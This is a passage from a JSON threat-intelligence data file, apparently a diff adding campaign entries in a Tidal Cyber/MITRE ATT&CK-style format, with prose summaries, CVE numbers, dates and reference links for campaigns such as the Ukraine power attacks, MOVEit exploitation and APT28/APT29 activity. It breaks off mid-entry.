"MITRE", + "tags": [] + }, + "related": [], + "uuid": "96e367d0-a744-5b63-85ec-595f505248a3", + "value": "2015 Ukraine Electric Power Attack" + }, + { + "description": "[2016 Ukraine Electric Power Attack](https://app.tidalcyber.com/campaigns/06197e03-e1c1-56af-ba98-5071f98f91f1) was a [Sandworm Team](https://app.tidalcyber.com/groups/16a65ee9-cd60-4f04-ba34-f2f45fcfc666) campaign during which they used [Industroyer](https://app.tidalcyber.com/software/09398a7c-aee5-44af-b99d-f73d3b39c299) malware to target and disrupt distribution substations within the Ukrainian power grid. This campaign was the second major public attack conducted against Ukraine by [Sandworm Team](https://app.tidalcyber.com/groups/16a65ee9-cd60-4f04-ba34-f2f45fcfc666).[[ESET Industroyer](https://app.tidalcyber.com/references/9197f712-3c53-4746-9722-30e248511611)][[Dragos Crashoverride 2018](https://app.tidalcyber.com/references/d14442d5-2557-4a92-9a29-b15a20752f56)]", + "meta": { + "campaign_attack_id": "C0025", + "first_seen": "2016-12-01T05:00:00Z", + "last_seen": "2016-12-01T05:00:00Z", + "source": "MITRE", + "tags": [] + }, + "related": [], + "uuid": "06197e03-e1c1-56af-ba98-5071f98f91f1", + "value": "2016 Ukraine Electric Power Attack" + }, + { + "description": "In July 2023, U.S. authorities released joint Cybersecurity Advisory AA23-187A, which detailed increased observations of new variants of the Truebot botnet malware infecting organizations in the United States and Canada. Authorities assessed that Truebot infections are primarily motivated around collection and exfiltration of sensitive victim data for financial gain. Officials also assessed that actors were using both spearphishing emails containing malicious hyperlinks and exploitation of CVE-2022-31199 in the IT system auditing application Netwrix Auditor to deliver Truebot during these attacks. Additional tools associated with the attacks included Raspberry Robin for initial infections, FlawedGrace and Cobalt Strike for various post-exploitation activities, and Teleport, a custom tool for data exfiltration.[[U.S. CISA Increased Truebot Activity July 6 2023](/references/6f9b8f72-c55f-4268-903e-1f8a82efa5bb)]\n\nThe Advisory did not provide specific impacted victim sectors. The Advisory referred to activity taking place “in recent months” prior to July 2023 but did not provide an estimated date when the summarized activity began. A public threat report referenced in the Advisory reported an observed increase in Truebot infections beginning in August 2022, including several compromises involving education sector organizations.[[U.S. CISA Increased Truebot Activity July 6 2023](/references/6f9b8f72-c55f-4268-903e-1f8a82efa5bb)][[Cisco Talos Blog December 08 2022](/references/bcf92374-48a3-480f-a679-9fd34b67bcdd)]\n\n**Related Vulnerabilities**: CVE-2022-31199[[U.S. CISA Increased Truebot Activity July 6 2023](/references/6f9b8f72-c55f-4268-903e-1f8a82efa5bb)]", + "meta": { + "campaign_attack_id": "C5000", + "first_seen": "2022-08-01T00:00:00Z", + "last_seen": "2023-05-31T00:00:00Z", + "owner": "TidalCyberIan", + "source": "Tidal Cyber", + "tags": [ + "1dc8fd1e-0737-405a-98a1-111dd557f1b5", + "15787198-6c8b-4f79-bf50-258d55072fee", + "7cc57262-5081-447e-85a3-31ebb4ab2ae5" + ] + }, + "related": [], + "uuid": "87e14285-b86f-4f50-8d60-85398ba728b1", + "value": "2023 Increased Truebot Activity" + }, + { + "description": "In August 2023, U.S. Cybersecurity & Infrastructure Security Agency (CISA) and Norwegian National Cyber Security Centre (NCSC-NO) authorities released Cybersecurity Advisory AA23-213A, which detailed observed exploitation of two vulnerabilities, CVE-2023-35078 and CVE-2023-35081, affecting Ivanti Endpoint Manager Mobile (EPMM), a solution which provides elevated access to an organization's mobile devices. According to the Advisory, authorities observed unspecified advanced persistent threat (APT) actors exploiting CVE-2023-35078 as a zero-day from at least April 2023 in order to gather information from unspecified organizations in Norway, and to gain initial access to a Norwegian government agency.\n\nIvanti released a CVE-2023-35078 patch on July 23, but then determined that CVE-2023-35081 could be chained together with the first vulnerability, a process which can enable arbitrary upload and execution of actor files, such as web shells. Ivanti released a CVE-2023-35081 patch on July 28. The Advisory provided mitigation recommendations, vulnerability and compromise identification methods, and incident response guidance, which can be found in the [source report](https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-213a).[[U.S. CISA CVE-2023-35078 Exploits](/references/62305b8a-76c8-49ec-82dc-6756643ccf7a)]\n\n**Related Vulnerabilities**: CVE-2023-35078[[U.S. CISA CVE-2023-35078 Exploits](/references/62305b8a-76c8-49ec-82dc-6756643ccf7a)], CVE-2023-35081[[U.S. CISA CVE-2023-35078 Exploits](/references/62305b8a-76c8-49ec-82dc-6756643ccf7a)]", + "meta": { + "campaign_attack_id": "C5004", + "first_seen": "2023-04-01T00:00:00Z", + "last_seen": "2023-07-28T00:00:00Z", + "owner": "TidalCyberIan", + "source": "Tidal Cyber", + "tags": [ + "2d80c940-ba2c-4d45-8272-69928953e9eb", + "15787198-6c8b-4f79-bf50-258d55072fee", + "a98d7a43-f227-478e-81de-e7299639a355", + "81e948b3-5ec0-4df8-b6e7-1b037b1b2e67", + "7551097a-dfdd-426f-aaa2-a2916dd9b873" + ] + }, + "related": [], + "uuid": "33fd2417-0a9c-4748-ab99-0e641ab29fbc", + "value": "2023 Ivanti EPMM APT Vulnerability Exploits" + }, + { + "description": "In September 2023, U.S. cybersecurity authorities released Cybersecurity Advisory AA23-250A, which detailed multiple intrusions in early 2023 involving an aeronautical sector organization and attributed to multiple unspecified “nation-state advanced persistent threat (APT) actors”. As early as January, one set of actors exploited CVE-2022-47966, a vulnerability in the Zoho ManageEngine ServiceDesk Plus IT service management application that allows remote code execution, to access the organization’s public-facing web servers. A separate set of actors was also observed exploiting CVE-2022-42475, a vulnerability in Fortinet, Inc.’s FortiOS SSL-VPN that also allows remote code execution, to gain access to the organization’s firewall devices.\n\nAfter gaining access, the actors downloaded malware, performed network discovery, collected administrator credentials, and moved laterally, but according to the advisory, unclear data storage records inhibited insight into whether any proprietary information was accessed, altered, or exfiltrated. A common behavior among both sets of actors was log deletion from critical servers and the use of disabled, legitimate administrator credentials, which in one case belonged to a previously employed contractor (the organization confirmed the credentials were disabled before the observed threat activity).[[U.S. CISA Zoho Exploits September 7 2023](/references/6bb581e8-ed0e-41fe-bf95-49b5d11b4e6b)]\n\nIn addition to behavioral observations and indicators of compromise, the Advisory provided detection and mitigation guidance, which can be found in the [source report](https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-250a).\n\n**Related Vulnerabilities**: CVE-2022-47966, CVE-2022-42475, CVE-2021-44228[[U.S. CISA Zoho Exploits September 7 2023](/references/6bb581e8-ed0e-41fe-bf95-49b5d11b4e6b)]", + "meta": { + "campaign_attack_id": "C5005", + "first_seen": "2023-01-01T00:00:00Z", + "last_seen": "2023-04-01T00:00:00Z", + "owner": "TidalCyberIan", + "source": "Tidal Cyber", + "tags": [ + "15787198-6c8b-4f79-bf50-258d55072fee", + "a98d7a43-f227-478e-81de-e7299639a355", + "7e6ef160-8e4f-4132-bdc4-9991f01c472e", + "793f4441-3916-4b3d-a3fd-686a59dc3de2", + "532b7819-d407-41e9-9733-0d716b69eb17" + ] + }, + "related": [], + "uuid": "d25f0485-fdf3-4b85-b2ec-53e98e215d0b", + "value": "2023 Zoho ManageEngine APT Exploits" + }, + { + "description": "In April 2023, U.S. and UK cybersecurity authorities released joint Cybersecurity Advisory AA23-108, which detailed a campaign by Russia-backed APT28 to compromise vulnerable routers running Cisco Internetworking Operating System (IOS). Actors collected device information and conducted further network reconnaissance on victims “worldwide”, including U.S. government institutions, 250 Ukrainian entities, and “a small number” of victims elsewhere in Europe. Adversary activity occurred over an unspecified timeframe in 2021.\n\nActors exploited CVE-2017-6742, a Simple Network Management Protocol (SNMP) vulnerability for which Cisco released a patch in 2017, and used default authentication strings to gain initial access to devices and subsequently gather router information, such as router interface details. In some cases, authorities observed actors deploying Jaguar Tooth, a malicious software bundle consisting of a series of payloads and patches. Jaguar Tooth deployments allowed actors to collect further device information via execution of Cisco IOS Command Line Interface commands, discover other network devices, and achieve unauthenticated, backdoor access to victim systems.[[U.S. CISA APT28 Cisco Routers April 18 2023](/references/c532a6fc-b27f-4240-a071-3eaa866bce89)]\n\nIn addition to behavioral observations, the Advisory also provided mitigation recommendations and indicators of compromise, which can be found in the [source report](https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-108).\n\n**Related Vulnerabilities**: CVE-2017-6742[[U.S. CISA APT28 Cisco Routers April 18 2023](/references/c532a6fc-b27f-4240-a071-3eaa866bce89)]", + "meta": { + "campaign_attack_id": "C5007", + "first_seen": "2021-01-01T00:00:00Z", + "last_seen": "2021-12-31T00:00:00Z", + "owner": "TidalCyberIan", + "source": "Tidal Cyber", + "tags": [ + "f01290d9-7160-44cb-949f-ee4947d04b6f", + "b20e7912-6a8d-46e3-8e13-9a3fc4813852" + ] + }, + "related": [], + "uuid": "ed8de8c3-03d2-4892-bd74-ccbc9afc3935", + "value": "APT28 Cisco Router Exploits" + }, + { + "description": "U.S. authorities and various international partners released joint cybersecurity advisory AA20-150A, which detailed a series of attacks linked to APT28 that leveraged compromised Ubiquiti EdgeRouters to facilitate the attacks. Actors used the network of compromised routers for a range of malicious activities, including harvesting credentials, proxying network traffic, and hosting fake landing pages and post-exploitation tools. Attacks targeted organizations in a wide range of sectors around the world.[[U.S. Federal Bureau of Investigation 2 27 2024](/references/962fb031-dfd1-43a7-8202-3a2231b0472b)] According to a separate U.S. Justice Department announcement, the botnet involved in these attacks differed from previous APT28-linked cases, since nation-state actors accessed routers that had been initially compromised by a separate, unspecified cybercriminal group.[[U.S. Justice Department GRU Botnet February 2024](/references/26a554dc-39c0-4638-902d-7e84fe01b961)]", + "meta": { + "campaign_attack_id": "C5015", + "first_seen": "2022-12-01T00:00:00Z", + "last_seen": "2024-01-01T00:00:00Z", + "owner": "TidalCyberIan", + "source": "Tidal Cyber", + "tags": [ + "af5e9be5-b86e-47af-91dd-966a5e34a186", + "6070668f-1cbd-4878-8066-c636d1d8659c", + "d8f7e071-fbfd-46f8-b431-e241bb1513ac", + "61cdbb28-cbfd-498b-9ab1-1f14337f9524", + "e551ae97-d1b4-484e-9267-89f33829ec2c", + "a98d7a43-f227-478e-81de-e7299639a355", + "916ea1e8-d117-45a4-8564-0597a02b06e4", + "b20e7912-6a8d-46e3-8e13-9a3fc4813852", + "e809d252-12cc-494d-94f5-954c49eb87ce" + ] + }, + "related": [], + "uuid": "2514a83a-3516-4d5d-a13c-2b6175989a26", + "value": "APT28 Router Compromise Attacks" + }, + { + "description": "UK cybersecurity authorities and international partners published Cybersecurity Advisory AA24-057A (February 2024), which detailed recent tactics, techniques, and procedures (TTPs) used by Russian state-backed adversary group APT29 to target cloud environments. The advisory indicated that as more government agencies and enterprises move elements of their operations to cloud infrastructure, APT29 actors have especially adapted their TTPs for gaining initial access into these cloud environments.[[U.S. CISA APT29 Cloud Access](/references/e9e08eca-1e01-4ff0-a8ef-49ecf66aaf3d)]", + "meta": { + "campaign_attack_id": "C5016", + "first_seen": "2023-02-26T00:00:00Z", + "last_seen": "2024-02-26T00:00:00Z", + "owner": "TidalCyberIan", + "source": "Tidal Cyber", + "tags": [ + "af5e9be5-b86e-47af-91dd-966a5e34a186", + "291c006e-f77a-4c9c-ae7e-084974c0e1eb" + ] + }, + "related": [], + "uuid": "c1257a02-716f-4477-9eab-c38827418ed2", + "value": "APT29 Cloud TTP Evolution" + }, + { + "description": "*Operationalize this intelligence by pivoting to relevant defensive resources via the Techniques below. Alternatively, use the **Add to Matrix** button above, then overlay entire sets of capabilities from your own defensive stack to identify threat overlaps & potential gaps (watch a [60-second tutorial here](https://www.youtube.com/watch?v=4jBo3XLO01E)).*\n\nIn December 2023, U.S. cybersecurity authorities and international partners released Cybersecurity Advisory AA23-347A, which detailed large-scale observed exploitation of CVE-2023-42793 since September 2023 by cyber threat actors associated with Russia’s Foreign Intelligence Service (SVR). According to the advisory, these actors are also known as APT29, the Dukes, CozyBear, and NOBELIUM/Midnight Blizzard.\n\nCVE-2023-42793 is an authentication bypass vulnerability in the JetBrains TeamCity software development program. After exploiting the vulnerability to gain access into victim networks, SVR actors were then observed escalating privileges, moving laterally, and deploying additional backdoors in an apparent effort to maintain long-term persistent access to victim environments. The advisory noted how SVR actors used access gained during the 2020 compromise of SolarWinds, another software company, to conduct supply chain operations affecting SolarWinds customers, but it also noted that such activity has not been observed in this case to date.\n\nJetBrains released a patch for CVE-2023-42793 in September 2023. The advisory indicated that the compromises observed to date appear to be opportunistic, impacting unpatched, internet-accessible TeamCity servers. “A few dozen” compromised entities have been identified so far (companies in disparate sectors in the United States, Europe, Asia, and Australia), but authorities assess that this tally does not represent the full number of compromised victims. Indicators of compromise, mitigation guidance, and detection resources – including Sigma and YARA rules – can be found in the [source report](https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a).[[U.S. CISA SVR TeamCity Exploits December 2023](/references/5f66f864-58c2-4b41-8011-61f954e04b7e)]", + "meta": { + "campaign_attack_id": "C5012", + "first_seen": "2023-09-01T00:00:00Z", + "last_seen": "2023-12-14T00:00:00Z", + "owner": "TidalCyberIan", + "source": "Tidal Cyber", + "tags": [ + "08809fa0-61b6-4394-b103-1c4d19a5be16", + "4a457eb3-e404-47e5-b349-8b1f743dc657" + ] + }, + "related": [], + "uuid": "80ae546a-70e5-4427-be1d-e74efc428ffd", + "value": "APT29 TeamCity Exploits" + }, + { + "description": "[C0010](https://app.tidalcyber.com/campaigns/a1e33caf-6eb0-442f-b97a-f6042f21df48) was a cyber espionage campaign conducted by UNC3890 that targeted Israeli shipping, government, aviation, energy, and healthcare organizations. Security researcher assess UNC3890 conducts operations in support of Iranian interests, and noted several limited technical connections to Iran, including PDB strings and Farsi language artifacts. [C0010](https://app.tidalcyber.com/campaigns/a1e33caf-6eb0-442f-b97a-f6042f21df48) began by at least late 2020, and was still ongoing as of mid-2022.[[Mandiant UNC3890 Aug 2022](https://app.tidalcyber.com/references/7b3fda0b-d327-4f02-bebe-2b8974f9959d)]", + "meta": { + "campaign_attack_id": "C0010", + "first_seen": "2020-12-01T07:00:00Z", + "last_seen": "2022-08-01T06:00:00Z", + "source": "MITRE", + "tags": [] + }, + "related": [], + "uuid": "a1e33caf-6eb0-442f-b97a-f6042f21df48", + "value": "C0010" + }, + { + "description": "[C0011](https://app.tidalcyber.com/campaigns/4c7386a7-9741-4ae4-8ad9-def03ed77e29) was a suspected cyber espionage campaign conducted by [Transparent Tribe](https://app.tidalcyber.com/groups/441b91d1-256a-4763-bac6-8f1c76764a25) that targeted students at universities and colleges in India. Security researchers noted this campaign against students was a significant shift from [Transparent Tribe](https://app.tidalcyber.com/groups/441b91d1-256a-4763-bac6-8f1c76764a25)'s historic targeting Indian government, military, and think tank personnel, and assessed it was still ongoing as of July 2022.[[Cisco Talos Transparent Tribe Education Campaign July 2022](https://app.tidalcyber.com/references/acb10fb6-608f-44d3-9faf-7e577b0e2786)] ", + "meta": { + "campaign_attack_id": "C0011", + "first_seen": "2021-12-01T06:00:00Z", + "last_seen": "2022-07-01T05:00:00Z", + "source": "MITRE", + "tags": [] + }, + "related": [], + "uuid": "4c7386a7-9741-4ae4-8ad9-def03ed77e29", + "value": "C0011" + }, + { + "description": "[C0015](https://app.tidalcyber.com/campaigns/85bbff82-ba0c-4193-a3b5-985afd5690c5) was a ransomware intrusion during which the unidentified attackers used [Bazar](https://app.tidalcyber.com/software/b35d9817-6ead-4dbd-a2fa-4b8e217f8eac), [Cobalt Strike](https://app.tidalcyber.com/software/9b6bcbba-3ab4-4a4c-a233-cd12254823f6), and [Conti](https://app.tidalcyber.com/software/8e995c29-2759-4aeb-9a0f-bb7cd97b06e5), along with other tools, over a 5 day period. Security researchers assessed the actors likely used the widely-circulated [Conti](https://app.tidalcyber.com/software/8e995c29-2759-4aeb-9a0f-bb7cd97b06e5) ransomware playbook based on the observed pattern of activity and operator errors.[[DFIR Conti Bazar Nov 2021](https://app.tidalcyber.com/references/a6f1a15d-448b-41d4-81f0-ee445cba83bd)]", + "meta": { + "campaign_attack_id": "C0015", + "first_seen": "2021-08-01T05:00:00Z", + "last_seen": "2021-08-01T05:00:00Z", + "source": "MITRE", + "tags": [ + "5e7433ad-a894-4489-93bc-41e90da90019", + "7e7b0c67-bb85-4996-a289-da0e792d7172" + ] + }, + "related": [], + "uuid": "85bbff82-ba0c-4193-a3b5-985afd5690c5", + "value": "C0015" + }, + { + "description": "[C0017](https://app.tidalcyber.com/campaigns/a56d7700-c015-52ca-9c52-fed4d122c100) was an [APT41](https://app.tidalcyber.com/groups/502223ee-8947-42f8-a532-a3b3da12b7d9) campaign conducted between May 2021 and February 2022 that successfully compromised at least six U.S. state government networks through the exploitation of vulnerable Internet facing web applications. During [C0017](https://app.tidalcyber.com/campaigns/a56d7700-c015-52ca-9c52-fed4d122c100), [APT41](https://app.tidalcyber.com/groups/502223ee-8947-42f8-a532-a3b3da12b7d9) was quick to adapt and use publicly-disclosed as well as zero-day vulnerabilities for initial access, and in at least two cases re-compromised victims following remediation efforts. The goals of [C0017](https://app.tidalcyber.com/campaigns/a56d7700-c015-52ca-9c52-fed4d122c100) are unknown, however [APT41](https://app.tidalcyber.com/groups/502223ee-8947-42f8-a532-a3b3da12b7d9) was observed exfiltrating Personal Identifiable Information (PII).[[Mandiant APT41](https://app.tidalcyber.com/references/e54415fe-40c2-55ff-9e75-881bc8a912b8)]", + "meta": { + "campaign_attack_id": "C0017", + "first_seen": "2021-05-01T04:00:00Z", + "last_seen": "2022-02-01T05:00:00Z", + "source": "MITRE", + "tags": [ + "a98d7a43-f227-478e-81de-e7299639a355" + ] + }, + "related": [], + "uuid": "a56d7700-c015-52ca-9c52-fed4d122c100", + "value": "C0017" + }, + { + "description": "\n[C0018](https://app.tidalcyber.com/campaigns/0452e367-aaa4-5a18-8028-a7ee136fe646) was a month-long ransomware intrusion that successfully deployed [AvosLocker](https://app.tidalcyber.com/software/e792dc8d-b0f4-5916-8850-a61ff53125d0) onto a compromised network. The unidentified actors gained initial access to the victim network through an exposed server and used a variety of open-source tools prior to executing [AvosLocker](https://app.tidalcyber.com/software/e792dc8d-b0f4-5916-8850-a61ff53125d0).[[Costa AvosLocker May 2022](https://app.tidalcyber.com/references/a94268d8-6b7c-574b-a588-d8fd80c27fd3)][[Cisco Talos Avos Jun 2022](https://app.tidalcyber.com/references/1170fdc2-6d8e-5b60-bf9e-ca915790e534)]", + "meta": { + "campaign_attack_id": "C0018", + "first_seen": "2022-02-01T05:00:00Z", + "last_seen": "2022-03-01T05:00:00Z", + "source": "MITRE", + "tags": [ + "5e7433ad-a894-4489-93bc-41e90da90019", + "7e7b0c67-bb85-4996-a289-da0e792d7172" + ] + }, + "related": [], + "uuid": "0452e367-aaa4-5a18-8028-a7ee136fe646", + "value": "C0018" + }, + { + "description": "[C0021](https://app.tidalcyber.com/campaigns/86bed8da-4cab-55fe-a2d0-9214db1a09cf) was a spearphishing campaign conducted in November 2018 that targeted public sector institutions, non-governmental organizations (NGOs), educational institutions, and private-sector corporations in the oil and gas, chemical, and hospitality industries. The majority of targets were located in the US, particularly in and around Washington D.C., with other targets located in Europe, Hong Kong, India, and Canada. [C0021](https://app.tidalcyber.com/campaigns/86bed8da-4cab-55fe-a2d0-9214db1a09cf)'s technical artifacts, tactics, techniques, and procedures (TTPs), and targeting overlap with previous suspected [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) activity.[[Microsoft Unidentified Dec 2018](https://app.tidalcyber.com/references/896c88f9-8765-4b60-b679-667b338757e3)][[FireEye APT29 Nov 2018](https://app.tidalcyber.com/references/30e769e0-4552-429b-b16e-27830d42edea)]", + "meta": { + "campaign_attack_id": "C0021", + "first_seen": "2018-11-01T05:00:00Z", + "last_seen": "2018-11-01T05:00:00Z", + "source": "MITRE", + "tags": [] + }, + "related": [], + "uuid": "86bed8da-4cab-55fe-a2d0-9214db1a09cf", + "value": "C0021" + }, + { + "description": "[C0026](https://app.tidalcyber.com/campaigns/41f283a1-b2ac-547d-98d5-ff907afd08c7) was a campaign identified in September 2022 that included the selective distribution of [KOPILUWAK](https://app.tidalcyber.com/software/d09c4459-1aa3-547d-99f4-7ac73b8043f0) and [QUIETCANARY](https://app.tidalcyber.com/software/52d3515c-5184-5257-bf24-56adccb4cccd) malware to previous [ANDROMEDA](https://app.tidalcyber.com/software/69aac793-9e6a-5167-bc62-823189ee2f7b) malware victims in Ukraine through re-registered [ANDROMEDA](https://app.tidalcyber.com/software/69aac793-9e6a-5167-bc62-823189ee2f7b) C2 domains. Several tools and tactics used during [C0026](https://app.tidalcyber.com/campaigns/41f283a1-b2ac-547d-98d5-ff907afd08c7) were consistent with historic [Turla](https://app.tidalcyber.com/groups/47ae4fb1-fc61-4e8e-9310-66dda706e1a2) operations.[[Mandiant Suspected Turla Campaign February 2023](https://app.tidalcyber.com/references/d8f43a52-a59e-5567-8259-821b1b6bde43)]", + "meta": { + "campaign_attack_id": "C0026", + "first_seen": "2022-08-01T05:00:00Z", + "last_seen": "2022-09-01T04:00:00Z", + "source": "MITRE", + "tags": [] + }, + "related": [], + "uuid": "41f283a1-b2ac-547d-98d5-ff907afd08c7", + "value": "C0026" + }, + { + "description": "[C0027](https://app.tidalcyber.com/campaigns/a9719584-4f52-5a5d-b0f7-1059e715c2b8) was a financially-motivated campaign linked to [Scattered Spider](https://app.tidalcyber.com/groups/3d77fb6c-cfb4-5563-b0be-7aa1ad535337) that targeted telecommunications and business process outsourcing (BPO) companies from at least June through December of 2022. During [C0027](https://app.tidalcyber.com/campaigns/a9719584-4f52-5a5d-b0f7-1059e715c2b8) [Scattered Spider](https://app.tidalcyber.com/groups/3d77fb6c-cfb4-5563-b0be-7aa1ad535337) used various forms of social engineering, performed SIM swapping, and attempted to leverage access from victim environments to mobile carrier networks.[[Crowdstrike TELCO BPO Campaign December 2022](https://app.tidalcyber.com/references/382785e1-4ef3-506e-b74f-cd07df9ae46e)]\n", + "meta": { + "campaign_attack_id": "C0027", + "first_seen": "2022-06-01T04:00:00Z", + "last_seen": "2022-12-01T05:00:00Z", + "source": "MITRE", + "tags": [] + }, + "related": [], + "uuid": "a9719584-4f52-5a5d-b0f7-1059e715c2b8", + "value": "C0027" + }, + { + "description": "In June 2023, U.S. authorities released Cybersecurity Advisory AA23-158A, which detailed observed exploits of a zero-day SQL injection vulnerability (CVE-2023-34362) affecting Progress Software's managed file transfer (MFT) solution, MOVEit Transfer. According to the Advisory, exploit activity began on May 27, 2023, as threat actors, which the Advisory attributed to \"CL0P Ransomware Gang, also known as TA505\", began compromising internet-facing MOVEit Transfer web applications. Actors deployed web shells, dubbed LEMURLOOT, on compromised MOVEit applications, which enabled persistence, discovery of files and folders stored on MOVEit servers, and staging and exfiltration of compressed victim data. Authorities indicated they expected to see \"widespread exploitation of unpatched software services in both private and public networks\".[[U.S. CISA CL0P CVE-2023-34362 Exploitation](/references/07e48ca8-b965-4234-b04a-dfad45d58b22)] Progress Software acknowledged the vulnerability and issued guidance on known affected versions, software upgrades, and patching.[[Progress Software MOVEit Transfer Critical Vulnerability](/references/9f364e22-b73c-4f3a-902c-a3f0eb01a2b9)]\n\n**Related Vulnerabilities**: CVE-2023-34362[[U.S. CISA CL0P CVE-2023-34362 Exploitation](/references/07e48ca8-b965-4234-b04a-dfad45d58b22)]", + "meta": { + "campaign_attack_id": "C5002", + "first_seen": "2023-05-27T00:00:00Z", + "last_seen": "2023-06-16T00:00:00Z", + "owner": "TidalCyberIan", + "source": "Tidal Cyber", + "tags": [ + "5e7433ad-a894-4489-93bc-41e90da90019", + "a98d7a43-f227-478e-81de-e7299639a355", + "173e1480-8d9b-49c5-854d-594dde9740d6" + ] + }, + "related": [], + "uuid": "f20c935b-e0c5-4941-b710-73cf06dd2b4a", + "value": "Clop MOVEit Transfer Vulnerability Exploitation" + }, + { + "description": "[CostaRicto](https://app.tidalcyber.com/campaigns/fb011ed2-bfb9-4f0f-bd88-8b3fa0cf9b48) was a suspected hacker-for-hire cyber espionage campaign that targeted multiple industries worldwide, with a large number being financial institutions. [CostaRicto](https://app.tidalcyber.com/campaigns/fb011ed2-bfb9-4f0f-bd88-8b3fa0cf9b48) actors targeted organizations in Europe, the Americas, Asia, Australia, and Africa, with a large concentration in South Asia (especially India, Bangladesh, and Singapore), using custom malware, open source tools, and a complex network of proxies and SSH tunnels.[[BlackBerry CostaRicto November 2020](https://app.tidalcyber.com/references/93a23447-641c-4ee2-9fbd-64b2adea8a5f)]", + "meta": { + "campaign_attack_id": "C0004", + "first_seen": "2019-10-01T04:00:00Z", + "last_seen": "2020-11-01T04:00:00Z", + "source": "MITRE", + "tags": [] + }, + "related": [], + "uuid": "fb011ed2-bfb9-4f0f-bd88-8b3fa0cf9b48", + "value": "CostaRicto" + }, + { + "description": "German and South Korean cybersecurity authorities published an advisory highlighting recent attempts by North Korea-linked cyber actors to target enterprises and research centers in the defense sector. The advisory detailed a supply chain attack, attributed to an unnamed threat group, in which actors compromised a company that maintained a defense sector research center's web servers, then used stolen SSH credentials to remotely access the research center's network. The actors then used various methods to evade defenses, including impersonating security staff, deployed malware via a patch management system, and stole account information and email contents before being evicted from the network.[[BfV North Korea February 17 2024](/references/cc76be15-6d9d-40b2-b7f3-196bb0a7106a)]", + "meta": { + "campaign_attack_id": "C5014", + "first_seen": "2022-12-01T00:00:00Z", + "last_seen": "2022-12-31T00:00:00Z", + "owner": "TidalCyberIan", + "source": "Tidal Cyber", + "tags": [ + "6070668f-1cbd-4878-8066-c636d1d8659c", + "d8f7e071-fbfd-46f8-b431-e241bb1513ac", + "e7ea1f6d-59f2-40c1-bbfe-835dedf033ee" + ] + }, + "related": [], + "uuid": "1a2caf4c-658d-4117-a912-55f4d6bca899", + "value": "Defense Sector Supply Chain Compromise by North Korea-Linked Actors" + }, + { + "description": "In September 2023, French cybersecurity authorities released advisory CERTFR-2023-CTI-007, which detailed a network intrusion of the Regional and University Hospital Center of Brest, in northwestern France. Actors used valid credentials belonging to a healthcare professional to connect to a remote desktop service exposed to the Internet, then installed Cobalt Strike and SystemBC to provide backdoor network access. Authorities indicated that the credentials were likely compromised via unspecified infostealer malware.\n\nThe actors used multiple third-party tools for credential access and discovery, and they attempted to exploit at least five vulnerabilities for privilege escalation and lateral movement. Authorities worked with hospital personnel to isolate affected systems and disrupt the intrusion before suspected data exfiltration and encryption could take place. Based on infrastructural and behavioral overlaps with other incidents, officials attributed the intrusion to the FIN12 financially motivated actor group and indicated the same actors are responsible for dozens of attacks on French victims in recent years.\n\nAdditional details, indicators of compromise, and the observed Cobalt Strike configuration can be found in the [source report](https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-007.pdf).[[CERTFR-2023-CTI-007](/references/0f4a03c5-79b3-418e-a77d-305d5a32caca)]\n\n**Related Vulnerabilities**: CVE-2023-21746, CVE-2022-24521, CVE-2021-34527, CVE-2019-0708, CVE-2020-1472[[CERTFR-2023-CTI-007](/references/0f4a03c5-79b3-418e-a77d-305d5a32caca)]", + "meta": { + "campaign_attack_id": "C5006", + "first_seen": "2023-03-01T00:00:00Z", + "last_seen": "2023-03-31T00:00:00Z", + "owner": "TidalCyberIan", + "source": "Tidal Cyber", + "tags": [ + "2743d495-7728-4a75-9e5f-b64854039792", + "ecd84106-2a5b-4d25-854e-b8d1f57f6b75", + "a6ba64e1-4b4a-4bbd-a26d-ce35c22b2530", + "4bc9ab8f-7f57-4b1a-8857-ffaa7e5cc930", + "d385b541-4033-48df-93cd-237ca6e46f36" + ] + }, + "related": [], + "uuid": "129ffe04-ea90-45d1-a2fd-7ff0bffa0433", + "value": "FIN12 March 2023 Hospital Center Intrusion" + }, + { + "description": "[Frankenstein](https://app.tidalcyber.com/campaigns/2fab9878-8aae-445a-86db-6b47b473f56b) was described by security researchers as a highly-targeted campaign conducted by moderately sophisticated and highly resourceful threat actors in early 2019. The unidentified actors primarily relied on open source tools, including [Empire](https://app.tidalcyber.com/software/fea655ac-558f-4dd0-867f-9a5553626207). The campaign name refers to the actors' ability to piece together several unrelated open-source tool components.[[Talos Frankenstein June 2019](https://app.tidalcyber.com/references/a6faa495-db01-43e8-9db3-d446570802bc)]", + "meta": { + "campaign_attack_id": "C0001", + "first_seen": "2019-01-01T06:00:00Z", + "last_seen": "2019-04-01T05:00:00Z", + "source": "MITRE", + "tags": [] + }, + "related": [], + "uuid": "2fab9878-8aae-445a-86db-6b47b473f56b", + "value": "Frankenstein" + }, + { + "description": "[FunnyDream](https://app.tidalcyber.com/campaigns/94587edf-0292-445b-8c66-b16629597f1e) was a suspected Chinese cyber espionage campaign that targeted government and foreign organizations in Malaysia, the Philippines, Taiwan, Vietnam, and other parts of Southeast Asia. Security researchers linked the [FunnyDream](https://app.tidalcyber.com/campaigns/94587edf-0292-445b-8c66-b16629597f1e) campaign to possible Chinese-speaking threat actors through the use of the [Chinoxy](https://app.tidalcyber.com/software/7c36563a-9143-4766-8aef-4e1787e18d8c) backdoor and noted infrastructure overlap with the TAG-16 threat group.[[Bitdefender FunnyDream Campaign November 2020](https://app.tidalcyber.com/references/b62a9f2c-02ca-4dfa-95fc-5dc6ad9568de)][[Kaspersky APT Trends Q1 2020](https://app.tidalcyber.com/references/23c91719-5ebe-4d03-8018-df1809fffd2f)][[Recorded Future Chinese Activity in Southeast Asia December 2021](https://app.tidalcyber.com/references/0809db3b-81a8-475d-920a-cb913b30f42e)]", + "meta": { + "campaign_attack_id": "C0007", + "first_seen": "2018-07-01T05:00:00Z", + "last_seen": "2020-11-01T04:00:00Z", + "source": "MITRE", + "tags": [] + }, + "related": [], + "uuid": "94587edf-0292-445b-8c66-b16629597f1e", + "value": "FunnyDream" + }, + { + "description": "In November 2022, U.S. cybersecurity authorities released Cybersecurity Advisory AA22-320A, which detailed an incident response engagement at an unspecified U.S. Federal Civilian Executive Branch organization. Authorities assessed that the network compromise was carried out by unspecified Iranian government-sponsored advanced persistent threat (APT) actors. The actors achieved initial network access by exploiting the Log4Shell vulnerability in an 